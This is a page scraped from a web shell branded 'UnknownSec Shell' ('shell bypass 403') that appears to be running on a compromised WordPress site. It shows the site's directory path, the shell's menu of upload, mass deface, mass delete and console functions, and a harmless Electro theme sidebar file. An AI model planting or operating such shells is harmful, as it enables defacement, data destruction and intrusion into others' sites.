shell bypass 403
UnknownSec Shell
:
/
home
/
innovagencyco
/
www
/
statxpress
/
wp-content
/
themes
/
electro
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
sidebar-shop.php
<?php /** * The sidebar containing the main widget area. * * @package Electro */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } ?> <?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'sidebar-shop' ) ) : ?> <div id="sidebar" class="sidebar" role="complementary"> <?php if ( is_active_sidebar( 'shop-sidebar-widgets' ) ) { if ( is_product() && apply_filters( 'electro_enable_single_product_sidebar', false ) ) { $sidebar_id = 'single-product-sidebar-widgets'; } else { $sidebar_id = 'shop-sidebar-widgets'; } dynamic_sidebar( $sidebar_id ); } else { do_action( 'electro_default_shop_sidebar_widgets' ); } ?> </div><!-- /.sidebar-shop --> <?php endif; ?>
© 2025 UnknownSec